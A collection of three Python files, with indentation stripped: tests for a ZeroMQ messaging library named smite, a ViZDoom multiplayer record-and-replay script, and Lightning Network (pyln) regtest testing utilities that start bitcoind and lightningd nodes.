assert thread_stats['processed_messages'] == 0
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['received_messages'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['processed_messages'] == 0
def test_noreply_message():
servant = Servant({'echo': lambda t: t})
servant.bind_tcp(HOST, PORT)
servant_thread = Thread(target=servant.run)
servant_thread.start()
client = Client()
client.connect(CONNECTION_URI)
client.send('echo', args=(uuid.uuid1().hex,), noreply=True)
time.sleep(2)
assert servant.stats['summary']['received_messages'] == 1
assert servant.stats['summary']['processed_messages'] == 1
servant.stop()
servant_thread.join()
client.close()
def test_rclient():
ipc_name = 'smite-test-{}'.format(uuid.uuid1().hex)
servant = Servant({'echo': lambda t: t})
servant.bind_ipc(ipc_name)
servant.run(True)
msg_num = 10
client = RClient('ipc://{}'.format(ipc_name))
for _ in range(msg_num):
echo_txt = uuid.uuid1().hex
rep = client.send('echo', echo_txt)
assert rep == echo_txt
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['received_messages'] == msg_num
assert servant.stats['summary']['processed_messages'] == msg_num
client.close()
servant.stop()
def test_default_handler():
ipc_name = 'smite-test-{}'.format(uuid.uuid1().hex)
default_handler = lambda t: t
servant = Servant()
servant.set_default_handler(default_handler)
servant.bind_ipc(ipc_name)
servant.run(True)
msg_num = 10
client = RClient('ipc://{}'.format(ipc_name))
for _ in range(msg_num):
msg_txt = uuid.uuid1().hex
random_msg_name = uuid.uuid1().hex
rep = client.send(random_msg_name, msg_txt)
assert rep == msg_txt
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['received_messages'] == msg_num
assert servant.stats['summary']['processed_messages'] == msg_num
client.close()
servant.stop()
def test_rclient_noreply():
ipc_name = 'smite-test-{}'.format(uuid.uuid1().hex)
servant = Servant({'echo': lambda t: t})
servant.bind_ipc(ipc_name)
servant.run(True)
msg_num = 10
client = RClient('ipc://{}'.format(ipc_name))
for _ in range(msg_num):
echo_txt = uuid.uuid1().hex
client.send_noreply('echo', echo_txt)
time.sleep(1)
assert servant.stats['summary']['exceptions'] == 0
assert servant.stats['summary']['malicious_messages'] == 0
assert servant.stats['summary']['received_messages'] == msg_num
assert servant.stats['summary']['processed_messages'] == msg_num
client.close()
servant.stop()
def test_multiple_clients():
def short_echo(text):
time.sleep(1)
return text
def long_echo(text):
time.sleep(2)
return text
called = {
'extract_one': False,
'extract_two': False,
'process_one': False,
'process_two': False,
}
def extract_one(msg):
called['extract_one'] = True
# 'foo:bar:real_message' -> 'bar:real_message'
return msg.split(':', 1)[1]
def extract_two(msg):
called['extract_two'] = True
# 'bar:real_message' -> 'real_message'
return msg.split('-', 1)[1]
servant = Servant(
{'short_echo': short_echo, 'long_echo': long_echo},
message_extractors=(extract_one, extract_two),
)
servant.bind_tcp(HOST, PORT)
servant.run(run_in_background=True)
def process_one(msg):
called['process_one'] = True
return 'bar-{}'.format(msg)
def process_two(msg):
called['process_two'] = True
return 'foo:{}'.format(msg)
def send_msg(msg_name):
client = Client(message_processors=(process_one, process_two))
client.connect(CONNECTION_URI)
msg_txt = uuid.uuid4().hex
res = client.send(msg_name, args=(msg_txt,))
assert res == msg_txt
client.close()
client_threads = []
# send short_echo
thread = Thread(target=send_msg('short_echo'))
client_threads.append(thread)
thread.start()
# send long_echo
thread = Thread(target=send_msg('long_echo'))
client_threads.append(thread)
thread.start()
# long echo takes 2 seconds
time.sleep(2.5)
assert servant.stats['summary']['received_messages'] == 2
assert servant.stats['summary']['processed_messages'] == 2
assert servant.stats['summary']['exceptions'] == 0
for was_called in called.values():
assert was_called
servant.stop()
for client_thread in client_threads:
client_thread.join()
def test_inappropriate_message_name():
raised = False
client = Client()
client.connect_ipc('foo')
try:
client.send(msg_name='__foo__')
except ValueError:
raised = True
assert raised
def test_client_not_connected():
raised = False
client = Client()
try:
client.send(msg_name='foo')
except RuntimeError:
raised = True
assert raised
def test_proxy():
host = '127.0.0.1'
proxy_port = '9000'
servant_port = '9001'
def echo(text):
return text
servant = Servant({'echo': echo})
servant.bind_tcp(host, servant_port)
servant_thread = Thread(target=servant.run)
servant_thread.start()
proxy = Proxy(host, servant_port)
proxy.bind(host, proxy_port)
proxy_thread = Thread(target=proxy.run)
proxy_thread.start()
class send_msg(object):
def __init__(self, message_name):
self.message_name = message_name
def __call__(self):
time.sleep(.3)
client = Client()
client.connect_tcp(host, proxy_port)
txt = uuid.uuid4().hex
res = client.send(self.message_name, args=(txt,))
assert res == txt
client.close()
messages_num = 10
client_threads = []
for i in xrange(messages_num):
thread = Thread(target=send_msg('echo'))
client_threads.append(thread)
thread.start()
time.sleep(1)
assert servant.stats['summary']['received_messages'] == messages_num
assert servant.stats['summary']['processed_messages'] == messages_num
assert servant.stats['summary']['exceptions'] == 0
servant.stop()
servant_thread.join()
proxy.stop()
proxy_thread.join()
def test_exception_response():
exc_message = 'This is dummy exception message'
class DummyException(Exception):
pass
def raise_dummy_exc():
raise DummyException(exc_message)
servant = Servant({'raise_dummy_exc': raise_dummy_exc})
servant.bind_tcp(HOST, PORT)
servant.run(True)
client = Client()
client.connect(CONNECTION_URI)
raised = False
try:
client.send('raise_dummy_exc')
except MessageException, e:
assert e.message == exc_message
raised = True
assert raised
time.sleep(.1)
assert servant.stats['summary']['received_messages'] == 1
assert servant.stats['summary']['exceptions'] == 1
servant.stop()
client.close()
def test_malicious_messages():
def echo(text):
return text
servant = Servant([echo])
servant.bind_tcp(HOST, PORT)
servant_thread = Thread(target=servant.run)
servant_thread.start()
ctx = zmq.Context()
socket = ctx.socket(zmq.DEALER)
poll = zmq.Poller()
poll.register(socket, zmq.POLLIN)
socket.connect('tcp://{}:{}'.format(HOST, PORT))
socket.send('foo')
sockets = dict(poll.poll(2000))
assert sockets.get(socket) != zmq.POLLIN
time.sleep(.2)
assert servant.stats['summary']['received_messages'] == 1
assert servant.stats['summary']['processed_messages'] == 0
assert servant.stats['summary']['malicious_messages'] == 1
servant.stop()
servant_thread.join()
def test_secure_messaging():
keys_dir = create_keys_dir()
def short_echo(text):
time.sleep(1)
return text
def long_echo(text):
time.sleep(2)
return text
send_msgs = ['short_echo', 'long_echo']
# generate keys for clients
client_secrets = [
utils.create_certificates(keys_dir, 'client-{}'.format(i))[1]
for i in range(2)
]
# generate keys for servant
servant_public, servant_secret = (
utils.create_certificates(keys_dir, 'servant')
)
servant = Servant({'short_echo': short_echo, 'long_echo': long_echo})
servant.enable_security(
os.path.join(keys_dir, 'public_keys'), servant_secret,
)
servant.bind_tcp(HOST, PORT)
servant_thread = Thread(target=servant.run)
servant_thread.start()
class send_msg(object):
def __init__(self, message_name, client_secret):
self.message_name = message_name
self.client_secret = client_secret
def __call__(self):
client = Client()
client.enable_security(self.client_secret, servant_public)
client.connect(CONNECTION_URI)
txt = uuid.uuid4().hex
res = client.send(self.message_name, args=(txt,))
assert res == txt
client.close()
client_threads = []
for client_secret, method_name in zip(client_secrets, send_msgs):
thread = Thread(target=send_msg(method_name, client_secret))
client_threads.append(thread)
thread.start()
# long echo takes 2 seconds
time.sleep(2.5)
assert servant.stats['summary']['received_messages'] == 2
assert servant.stats['summary']['processed_messages'] == 2
assert servant.stats['summary']['exceptions'] == 0
servant.stop()
servant_thread.join()
for client_thread in client_threads:
client_thread.join()
|
record_multiplayer.py
|
#!/usr/bin/python
from __future__ import print_function
from vizdoom import *
from random import choice
import os
from multiprocessing import Process
def player1():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 0.15 +sv_spawnfarthest 1 ")
game.add_game_args("+name Player1 +colorset 0")
# Unfortunately multiplayer game cannot be recorded using new_episode() method, use this command instead.
game.add_game_args("-record multi_rec.lmp")
game.init()
actions = [[True,False,False],[False,True,False],[False,False,True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Game finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.close()
def player2():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
game.set_window_visible(False)
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True,False,False],[False,True,False],[False,False,True]]
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.close()
def replay_as_player2():
game = DoomGame()
game.load_config('../config/multi_duel.cfg')
# At this moment ViZDoom will crash if there is no starting point - this is workaround for multiplayer map.
game.add_game_args("-host 1 -deathmatch")
game.init()
# Replays episode recorded by player 1 from perspective of player2.
game.replay_episode("multi_rec.lmp", 2)
while not game.is_episode_finished():
game.advance_action()
print("Game finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.PLAYER1_FRAGCOUNT))
print("Player2 frags:", game.get_game_variable(GameVariable.PLAYER2_FRAGCOUNT))
game.close()
# Delete multi_rec.lmp
os.remove("multi_rec.lmp")
if __name__ == '__main__':
print("\nRECORDING")
print("************************\n")
p1 = Process(target = player1)
p1.start()
player2()
print("\nREPLAY")
print("************************\n")
replay_as_player2()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from pyln.client import LightningRpc
import json
import logging
import lzma
import math
import os
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
if TEST_DEBUG:
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, may_fail=False,
may_reconnect=False, allow_broken_log=False,
allow_bad_gossip=False, db=None, port=None, disconnect=None, random_hsm=None, options=None, **kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = LightningRpc(socket_path, self.executor)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if VALGRIND:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount, announce=announce_channel)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
